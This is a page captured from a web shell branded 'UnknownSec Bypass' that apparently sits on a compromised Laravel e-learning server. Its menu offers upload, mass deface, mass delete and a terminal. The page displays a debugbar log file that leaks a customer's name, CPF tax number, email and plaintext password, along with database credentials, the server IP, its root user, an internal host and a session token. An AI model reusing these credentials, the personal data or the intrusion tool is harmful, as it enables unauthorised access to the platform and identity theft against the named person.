UnknownSec Bypass
403
:
/
mnt
/
lmsestudio-instance-vol002
/
eagleead
/
storage
/
debugbar
/ [
drwxrwxrwx
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
cdbdaee650a53486ea493045271c2861.json
{"__meta":{"id":"cdbdaee650a53486ea493045271c2861","datetime":"2025-12-31 22:26:00","utime":1767230760.104995,"method":"GET","uri":"\/api\/swagger.json","ip":"157.245.204.205"},"php":{"version":"7.1.33-16+ubuntu16.04.1+deb.sury.org+1","interface":"apache2handler"},"messages":{"count":0,"messages":[]},"time":{"start":1767230759.919,"end":1767230760.105037,"duration":0.1860370635986328,"duration_str":"186.04ms","measures":[{"label":"Booting","start":1767230759.919,"relative_start":0,"end":1767230760.067592,"relative_end":1767230760.067592,"duration":0.1485919952392578,"duration_str":"148.59ms","params":[],"collector":null},{"label":"Application","start":1767230759.944057,"relative_start":0.025057077407836914,"end":1767230760.105042,"relative_end":5.0067901611328125e-6,"duration":0.16098499298095703,"duration_str":"160.98ms","params":[],"collector":null}]},"memory":{"peak_usage":8388608,"peak_usage_str":"8MB"},"exceptions":{"count":1,"exceptions":[{"type":"Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException","message":"","code":0,"file":"\/mnt\/lmsestudio-instance-vol002\/eagleead\/vendor\/laravel\/framework\/src\/Illuminate\/Routing\/RouteCollection.php","line":161,"surrounding_lines":[" return $this->getRouteForMethods($request, $others);\n"," }\n","\n"," throw new NotFoundHttpException;\n"," }\n","\n"," \/**\n"]}]},"views":{"nb_templates":2,"templates":[{"name":"errors.404 (resources\/views\/errors\/404.blade.php)","param_count":1,"params":["exception"],"type":"blade"},{"name":"layouts.error (resources\/views\/layouts\/error.blade.php)","param_count":12,"params":["obLevel","__env","app","config","template","boleto","version","theme","recipient","arrYears","errors","exception"],"type":"blade"}]},"route":[],"queries":{"nb_statements":11,"nb_failed_statements":0,"accumulated_duration":0.024499999999999997,"accumulated_duration_str":"24.5ms","statements":[{"sql":"select * from `configs` limit 1","type":"query","params":[],"bindings":[],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table","The <code>SELECT<\/code> statement has no <code>WHERE<\/code> clause and could examine many more rows than intended","<code>LIMIT<\/code> without <code>ORDER BY<\/code> causes non-deterministic results, depending on the query execution plan"],"backtrace":[],"duration":0.0018700000000000001,"duration_str":"1.87ms","stmt_id":"","connection":"LMS_1b129b83352b"},{"sql":"select * from `templates` limit 1","type":"query","params":[],"bindings":[],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table","The <code>SELECT<\/code> statement has no <code>WHERE<\/code> clause and could examine many more rows than intended","<code>LIMIT<\/code> without <code>ORDER BY<\/code> causes non-deterministic results, depending on the query execution plan"],"backtrace":[],"duration":0.0011799999999999998,"duration_str":"1.18ms","stmt_id":"","connection":"LMS_1b129b83352b"},{"sql":"select * from `boletos` limit 1","type":"query","params":[],"bindings":[],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table","The <code>SELECT<\/code> statement has no <code>WHERE<\/code> clause and could examine many more rows than intended","<code>LIMIT<\/code> without <code>ORDER BY<\/code> causes non-deterministic results, depending on the query execution plan"],"backtrace":[],"duration":0.0011799999999999998,"duration_str":"1.18ms","stmt_id":"","connection":"LMS_1b129b83352b"},{"sql":"select * from `pagarme_recipients` limit 1","type":"query","params":[],"bindings":[],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table","The <code>SELECT<\/code> statement has no <code>WHERE<\/code> clause and could examine many more rows than intended","<code>LIMIT<\/code> without <code>ORDER BY<\/code> causes non-deterministic results, depending on the query execution plan"],"backtrace":[],"duration":0.00115,"duration_str":"1.15ms","stmt_id":"","connection":"LMS_1b129b83352b"},{"sql":"select * from `themes` where `themes`.`id` = '1' limit 1","type":"query","params":[],"bindings":["1"],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table","<code>LIMIT<\/code> without <code>ORDER BY<\/code> causes non-deterministic results, depending on the query execution plan"],"backtrace":[],"duration":0.00086,"duration_str":"860\u03bcs","stmt_id":"","connection":"LMS_1b129b83352b"},{"sql":"select * from `saas_configs` limit 1","type":"query","params":[],"bindings":[],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table","The <code>SELECT<\/code> statement has no <code>WHERE<\/code> clause and could examine many more rows than intended","<code>LIMIT<\/code> without <code>ORDER BY<\/code> causes non-deterministic results, depending on the query execution plan"],"backtrace":[],"duration":0.00101,"duration_str":"1.01ms","stmt_id":"","connection":"LMS_1b129b83352b"},{"sql":"select `customers`.*, `plans`.`id` as `plan_plan_id`, `plans`.`name` as `plan_name`, `plans`.`description` as `plan_description`, `plans`.`server_id` as `plan_server_id`, `plans`.`dataserver_id` as `plan_dataserver_id`, `plans`.`processors` as `plan_processors`, `plans`.`memory` as `plan_memory`, `plans`.`users_limit` as `plan_users_limit`, `plans`.`storage` as `plan_storage`, `plans`.`data_transfer` as `plan_data_transfer`, `plans`.`price` as `plan_price`, `servers`.`host` as `serverHost`, `servers`.`absolute_path` as `serverPath`, `servers`.`root_user` as `serverUser`, `dataservers`.`host` as `dataserverHost`, `dataservers`.`root_user` as `dataserverUser`, `new_subscriptions`.`subscription_hash`, `new_subscriptions`.`start_period`, `new_subscriptions`.`end_period`, `new_subscriptions`.`total_charges`, `new_subscriptions`.`status`, `new_recurrings`.`gross_amount`, `new_recurrings`.`payment_method`, `new_recurrings`.`charge_number`, `new_recurrings`.`due_date`, `new_recurrings`.`boleto_url` from `customers` inner join `plans` on `plan_id` = `plans`.`id` inner join `servers` on `customers`.`server_id` = `servers`.`id` inner join `dataservers` on `customers`.`dataserver_id` = `dataservers`.`id` left join `new_subscriptions` on `customers`.`subscription_hash` = `new_subscriptions`.`subscription_hash` and `new_subscriptions`.`status` < '7' left join `new_recurrings` on `new_subscriptions`.`subscription_hash` = `new_recurrings`.`subscription_hash` and `new_recurrings`.`id` = (SELECT MAX(new_recurrings.id) FROM new_recurrings WHERE new_recurrings.subscription_hash = new_subscriptions.subscription_hash) where `tenant_id` = 'c6fe7a3c2bc80a7c1eb396ae2252dde2' limit 1","type":"query","params":[],"bindings":["7","c6fe7a3c2bc80a7c1eb396ae2252dde2"],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table","<code>LIMIT<\/code> without <code>ORDER BY<\/code> causes non-deterministic results, depending on the query execution plan"],"backtrace":[],"duration":0.01112,"duration_str":"11.12ms","stmt_id":"","connection":"lmspanel"},{"sql":"select COUNT(*) AS actives, hired_courses.user_id from `hired_courses` inner join `hirings` on `hirings_id` = `hirings`.`id` where `hired_courses`.`status` in ('3', '4') and hirings.gateway_id <> \"PagarMe\" group by `hired_courses`.`user_id` order by `hired_courses`.`user_id` asc","type":"query","params":[],"bindings":["3","4"],"hints":[],"backtrace":[],"duration":0.00174,"duration_str":"1.74ms","stmt_id":"","connection":"LMS_1b129b83352b"},{"sql":"select * from `customers` where `id` = '1' limit 1","type":"query","params":[],"bindings":["1"],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table","<code>LIMIT<\/code> without <code>ORDER BY<\/code> causes non-deterministic results, depending on the query execution plan"],"backtrace":[],"duration":0.00116,"duration_str":"1.16ms","stmt_id":"","connection":"lmspanel"},{"sql":"select `subscriptions`.*, `subscription_statuses`.`description` from `subscriptions` inner join `subscription_statuses` on `subscription_status_id` = `subscription_statuses`.`id` where `customer_id` = '1' and `subscription_status_id` in ('2', '3', '4') limit 1","type":"query","params":[],"bindings":["1","2","3","4"],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table","<code>LIMIT<\/code> without <code>ORDER BY<\/code> causes non-deterministic results, depending on the query execution plan"],"backtrace":[],"duration":0.00124,"duration_str":"1.24ms","stmt_id":"","connection":"lmspanel"},{"sql":"select * from `configs` limit 1","type":"query","params":[],"bindings":[],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table","The <code>SELECT<\/code> statement has no <code>WHERE<\/code> clause and could examine many more rows than intended","<code>LIMIT<\/code> without <code>ORDER BY<\/code> causes non-deterministic results, depending on the query execution plan"],"backtrace":[],"duration":0.00199,"duration_str":"1.99ms","stmt_id":"","connection":"LMS_1b129b83352b"}]},"swiftmailer_mails":{"count":0,"mails":[]},"request":{"format":"html","content_type":"text\/html","status_text":"Not Found","status_code":"404","request_query":"[]","request_request":"[]","request_headers":"array:5 [\n \"host\" => array:1 [\n 0 => \"eagle.ead.lmsestudio.com.br\"\n ]\n \"user-agent\" => array:1 [\n 0 => \"Mozilla\/5.0 (l9scan\/2.0.334313e21343e2833313e2437313; +https:\/\/leakix.net)\"\n ]\n \"accept\" => array:1 [\n 0 => \"text\/html,application\/json\"\n ]\n \"accept-encoding\" => array:1 [\n 0 => \"gzip\"\n ]\n \"connection\" => array:1 [\n 0 => \"close\"\n ]\n]","request_server":"array:34 [\n \"REDIRECT_HTTPS\" => \"on\"\n \"REDIRECT_SSL_TLS_SNI\" => \"eagle.ead.lmsestudio.com.br\"\n \"REDIRECT_STATUS\" => \"200\"\n \"HTTPS\" => \"on\"\n \"SSL_TLS_SNI\" => \"eagle.ead.lmsestudio.com.br\"\n \"HTTP_HOST\" => \"eagle.ead.lmsestudio.com.br\"\n \"HTTP_USER_AGENT\" => \"Mozilla\/5.0 (l9scan\/2.0.334313e21343e2833313e2437313; +https:\/\/leakix.net)\"\n \"HTTP_ACCEPT\" => \"text\/html,application\/json\"\n \"HTTP_ACCEPT_ENCODING\" => \"gzip\"\n \"HTTP_CONNECTION\" => \"close\"\n \"PATH\" => \"\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/snap\/bin\"\n \"SERVER_SIGNATURE\" => \"\"\n \"SERVER_SOFTWARE\" => \"Apache\"\n \"SERVER_NAME\" => \"eagle.ead.lmsestudio.com.br\"\n \"SERVER_ADDR\" => \"174.138.41.143\"\n \"SERVER_PORT\" => \"443\"\n \"REMOTE_ADDR\" => \"157.245.204.205\"\n \"DOCUMENT_ROOT\" => \"\/mnt\/lmsestudio-instance-vol002\/eagleead\/public\"\n \"REQUEST_SCHEME\" => \"https\"\n \"CONTEXT_PREFIX\" => \"\"\n \"CONTEXT_DOCUMENT_ROOT\" => \"\/mnt\/lmsestudio-instance-vol002\/eagleead\/public\"\n \"SERVER_ADMIN\" => \"webmaster@localhost174.138.41.143\"\n \"SCRIPT_FILENAME\" => \"\/mnt\/lmsestudio-instance-vol002\/eagleead\/public\/index.php\"\n \"REMOTE_PORT\" => \"34970\"\n \"REDIRECT_URL\" => \"\/api\/swagger.json\"\n \"GATEWAY_INTERFACE\" => \"CGI\/1.1\"\n \"SERVER_PROTOCOL\" => \"HTTP\/1.1\"\n \"REQUEST_METHOD\" => \"GET\"\n \"QUERY_STRING\" => \"\"\n \"REQUEST_URI\" => \"\/api\/swagger.json\"\n \"SCRIPT_NAME\" => \"\/index.php\"\n \"PHP_SELF\" => \"\/index.php\"\n \"REQUEST_TIME_FLOAT\" => 1767230759.919\n \"REQUEST_TIME\" => 1767230759\n]","request_cookies":"[]","response_headers":"array:2 [\n \"cache-control\" => array:1 [\n 0 => \"no-cache, private\"\n ]\n \"date\" => array:1 [\n 0 => \"Thu, 01 Jan 2026 01:26:00 GMT\"\n ]\n]","path_info":"\/api\/swagger.json","session_attributes":"array:5 [\n \"planLimite\" => array:50 [\n \"id\" => 1\n \"tenant_id\" => \"c6fe7a3c2bc80a7c1eb396ae2252dde2\"\n \"name\" => \"M\u00e1rlon Mendes Etiene\"\n \"document_number\" => \"04411428776\"\n \"document_type\" => \"cpf\"\n \"project_name\" => \"Eagle EAD\"\n \"project_slug\" => \"eagleead\"\n \"email\" => \"marlon@eaglesistemas.com.br\"\n \"url\" => \"eagle.ead\"\n \"domain\" => \"lmsestudio.com.br\"\n \"plan_id\" => 15\n \"server_id\" => 3\n \"dataserver_id\" => 4\n \"password\" => \"123456aA@\"\n \"password_changed_at\" => \"2025-09-23 18:16:41\"\n \"password_change_required\" => 0\n \"database_name\" => \"LMS_1b129b83352b\"\n \"database_user\" => \"LMS_1b129b83352b\"\n \"database_pwd\" => \"LMS_1b129b83352b\"\n \"absolute_path\" => \"\/mnt\/lmsestudio-instance-vol002\/\"\n \"normal_site\" => 1\n \"active\" => 1\n \"is_free\" => 0\n \"auto_upgrade\" => 0\n \"ssl_activated\" => 1\n \"dns_id\" => \"100482546\"\n \"allow_beta_feature\" => 0\n \"white_label\" => 0\n \"lms_version\" => \"v3.5.1\\n\"\n \"created_at\" => \"2017-09-20 15:11:58\"\n \"updated_at\" => \"2025-09-23 18:16:41\"\n \"gateway_id\" => 12353942\n \"plan_plan_id\" => 15\n \"plan_name\" => \"Plano Premium\"\n \"plan_description\" => \"Plano especial para at\u00e9 10mil alunos + ferramentas premium + plataforma customizada pela nossa equipe + suporte t\u00e9cnico + Ecossistema Neg\u00f3cio Pronto + 2hs de Treinamento Realtime.\"\n \"plan_server_id\" => 1\n \"plan_dataserver_id\" => 1\n \"plan_processors\" => 2\n \"plan_memory\" => 4096\n \"plan_users_limit\" => 10000\n \"plan_storage\" => 184320\n \"plan_data_transfer\" => 184320\n \"plan_price\" => \"987.50\"\n \"serverHost\" => \"174.138.41.143\"\n \"serverPath\" => \"\/mnt\/lmsestudio-instance-vol002\/\"\n \"serverUser\" => \"root\"\n \"dataserverHost\" => \"10.136.96.24\"\n \"dataserverUser\" => \"db001\"\n \"activeUsers\" => 0\n \"storageSize\" => 593.75547409058\n ]\n \"bankSlip\" => array:1 [\n \"type\" => \"free\"\n ]\n \"_token\" => \"Vwzl3CWSOCDF6sAqsoa5sZO0IsequFNktLAdUVkY\"\n \"lang\" => \"pt\"\n \"PHPDEBUGBAR_STACK_DATA\" => []\n]"}}
Copyright © 2026 - UnknownSec